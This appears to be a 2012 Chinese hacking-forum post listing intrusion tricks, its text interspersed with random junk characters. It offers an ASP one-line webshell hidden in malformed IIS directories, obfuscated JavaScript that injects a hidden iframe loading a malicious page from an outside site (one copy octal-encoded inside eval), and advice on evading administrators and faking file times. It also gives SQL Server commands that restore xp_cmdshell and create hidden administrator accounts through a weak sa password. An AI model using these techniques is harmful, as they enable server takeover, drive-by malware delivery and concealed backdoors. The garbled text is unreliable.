# h* G! K+ [0 u1、建立非标准目录:mkdir images..\- G" L' j9 m i. j: t, H3 z0 G
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
; Y! h4 i# {0 p" K- S3 f通过web访问ASP木马:http://ip/images../news.asp?action=login
0 R& T$ t) m4 v: O- O& n) D. I7 T如何删除非标准目录:rmdir images..\ /s
- N |! I( K/ K6 ^, Z% t T2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:8 g- j# L4 J5 ~1 Z9 ?. p( E
mkdir programme.asp
" | A; [! I2 T) X2 q Y3 s9 U新建1.txt文件内容:<!--#include file=”12.jpg”--># f& g! ]" n& f& R0 w. t
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件4 Z& Z7 {: R& b6 w# x$ b# D
attrib +H +S programme.asp
- K* g K7 p( ^' u ^8 J通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
, ^! x+ C4 J7 P+ I( z. z, t5 E9 {0 N- V5 Q+ ~
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
% y- q! l/ s4 [: m* v/ [然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
& Z$ |# A5 G1 U1 Y3 K- t/ V' R# v9 U- A. C. l- L0 B, W3 `
55、JS隐蔽挂马
' x1 V5 b. s3 D( k1./ ?5 E1 H9 G+ v, R* O4 ]0 \) |; z
var tr4c3="<iframe src=ht";
b+ s& B" G3 j0 _& M! e2 k, Mtr4c3 = tr4c3+"tp:/";& Q5 E. i! Z( t$ A. ?& R% l
tr4c3 = tr4c3+"/ww";
4 ~( M; K- L- Otr4c3 = tr4c3+"w.tr4";
$ [. h# u/ B. y" Otr4c3 = tr4c3+"c3.com/inc/m";# @" _% F6 J5 }4 q" o0 [
tr4c3 = tr4c3+"m.htm style="display:none"></i";
1 P/ b' y* X4 L: G' E C( [% y) ltr4c3 =tr4c3+"frame>'";7 y6 G6 a$ ]* T* @
document.write(tr4c3);0 t. e: |6 M; f9 ?: a% y W: S- _
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
+ b8 h: J/ V2 v1 D K
+ o3 S d/ Z! A2.
7 N. F7 B/ K ?( q/ |0 a转换进制,然后用EVAL执行。如8 K) H* q0 |, Y2 @ z$ t4 @( R
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");; `6 X r, G- S6 H3 C: {$ ~
不过这个有点显眼。/ \8 C& A0 x, ?
3.
& _* z& P6 x% m/ {+ W) @ N5 _+ n/ |document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');$ K$ L, j! \# D: s( w( h4 ^' w) X
最后一点,别忘了把文件的时间也修改下。
# U5 E! r9 f! ]" B5 P+ J0 B+ J0 w9 @( L/ a) g
56.3389终端入侵常用DOS命令
" A. @- A) O ]4 Y- ]4 _: ^& Ztaskkill taskkill /PID 1248 /t( G! c5 B0 Y. U
; w( P W% d! J( C; T+ ~* T
tasklist 查进程
" Y* m9 P. c7 J
j/ O! s; w2 T8 Scacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限7 L; F% `# h) V- `. ~% g
iisreset /reboot5 ?7 F N- ?7 L3 s( c
tsshutdn /reboot /delay:1 重起服务器" k# ]/ r" _4 \9 \
' e+ }0 r; q- i+ G7 l3 x) b' H$ e
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
+ X' u1 n) k# ?5 ~% g% F5 n
5 a7 ^1 r) _! M$ jquery user 查看当前终端用户在线情况
5 A/ f" }/ ]% T* _( [$ j& Z7 |+ C, S* j" ~* |; D1 P
要显示有关所有会话使用的进程的信息,请键入:query process *
2 v; m& D) p' E3 a' p( Y; R" H
, x# r0 u3 F- A* F% I3 G5 `要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
% A4 O4 @# \! U$ @8 }! M
& |& {* d6 B `; v2 m. ~+ u' P r要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
" G! ]! Y# k% y& Z* E0 w
, Z* ^' @. x' }/ {) V+ S/ J% K要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
; V6 Q2 ~6 v9 T% _, @5 A9 s$ H' z! W8 j1 ?
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启2 {( z/ x: M7 A
* f) F% e# m/ M* j& A2 k) f, Z) L5 {
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
7 R. W- R- I" X% h5 O5 Y; @+ P3 T6 q7 d" V% R& ^; T7 _* S, `" ]: o: N
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。) ~. B9 \. K- ^! r$ E2 B. X5 ^
5 P' w# G& u# t命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
# l$ z, ~ P3 @: X+ D8 T+ O+ o: B5 o/ h1 R( _9 M3 Y) G4 ]4 ?. Q6 Z
56、在地址栏或按Ctrl+O,输入:4 u) V+ Y1 v. c% x, [
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
; ^/ K% r7 x$ K* i' n
3 b2 p# ]" }8 [/ d' c p& I4 g源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。4 P+ D# E, n2 G- F3 x0 n
- b7 G4 y) C ? f$ ]3 j57、net user的时候,是不能显示加$的用户,但是如果不处理的话,3 H) Y3 n; J; ]& |, B$ Q
用net localgroup administrators是可以看到管理组下,加了$的用户的。
9 }5 @ L0 q4 Z
8 e. V. v! ?) ?& j# }, L3 R58、 sa弱口令相关命令
% f3 v3 l2 A: D6 U
/ a5 y4 K( s$ r3 V# |! ~一.更改sa口令方法:
5 u9 @# Q7 H3 x" ^3 k) F+ ]用sql综合利用工具连接后,执行命令:
1 Q* \+ ?3 T% p ]2 dexec sp_password NULL,'20001001','sa'
2 a& a9 W$ @ j+ J6 X(提示:慎用!)
5 T _2 B& ^% M L3 |( R
( v5 n& `- `! u& ?3 L4 A; C0 K二.简单修补sa弱口令.
1 K5 z+ c N: | u% G5 t2 e# w
! b. U+ w: Y8 d2 H方法1:查询分离器连接后执行:
% y5 [% b3 s& Kif exists (select * from
! ?0 N0 ]1 K1 @9 q' fdbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and- f8 r9 @+ V4 A+ O2 n* F8 A
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)' y( d/ q* D5 q }- J
8 J% ]/ }& \( v3 W% F- B3 d
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'7 ~$ F& Z- e, s7 x# d' J
8 W/ R0 M3 P z+ X9 CGO
1 `5 e, M. ~# h; F$ @4 @; U" {3 w. T4 R: S8 l8 c
然后按F5键命令执行完毕- m! b" E ?1 P& y' z
% z! K$ e. T" e4 A方法2:查询分离器连接后
' b( ]' d7 P# B+ N- C第一步执行:use master
) e6 G6 J( A: _3 x9 o }第二步执行:sp_dropextendedproc 'xp_cmdshell'0 C$ L4 M0 c# C, Y- F) o
然后按F5键命令执行完毕* I6 D% n# y% |, x
. c" S7 C, n8 D/ _& L( F
1 _% U$ a$ S9 V三.常见情况恢复执行xp_cmdshell.4 t7 |# d% F1 ?7 @% d
0 u2 c1 C9 d v/ l3 k
6 ^7 l6 ?8 Y" i& C9 X1 未能找到存储过程'master..xpcmdshell'.) S9 K0 \8 x- C# h, u! \ X
恢复方法:查询分离器连接后,9 g6 v: z# I! }1 Z
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int3 K# S" |5 B' J' A$ o$ X
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
0 Y9 Q: {6 _9 P' I0 e) f7 X然后按F5键命令执行完毕& X% I) {& g; ]
0 T3 G0 X) Q h0 p7 X/ t( m k7 c3 O2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)/ t6 m1 ~9 Z, K, P
恢复方法:查询分离器连接后,; X2 v/ k7 }* \& u# P8 W
第一步执行:sp_dropextendedproc "xp_cmdshell") v3 [% n0 `$ I V! h9 q1 @) ~
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
% r) i6 g* @% d1 n* r/ m- o然后按F5键命令执行完毕
& T3 x/ r, F1 ^* B+ s4 R
3 n: A! i# r% ]: x4 j: S9 D3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
" W2 b- O4 `! ?1 n恢复方法:查询分离器连接后,
8 y. q5 G; }+ L: j5 {" r9 m第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
: @1 b) W( L5 S. Y6 j( f3 ~2 c第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
9 \+ _" m4 |5 y' X! n F然后按F5键命令执行完毕
1 K! N6 B/ c. {; Z8 t0 w) t0 |/ T# F
四.终极方法.
% h$ `4 M+ n- D u$ v" Z如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
9 a/ w3 a+ g- Z4 X- w查询分离器连接后,8 {6 a" n$ n& `
2000servser系统:& n A; z, w; ], t' s# F- C
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'1 h2 S; p+ M+ x/ [1 k. h
$ g% x4 _' N* _# K S9 s
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
" a- A0 `/ V& Z- l& C3 i
+ \1 z3 y, g9 T. V' I1 Lxp或2003server系统:9 A: G9 E( f; o. K% a- ^# {
q4 M+ g8 B. Z5 u; S6 zdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'. t% ~# o/ }& H5 c( ^) e2 L j, j6 d
# U' C t6 n" C/ p) K5 O
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'% R# z, I$ S' @/ F0 K
|
发表于 2012-9-15 14:13:15
收藏
支持
反对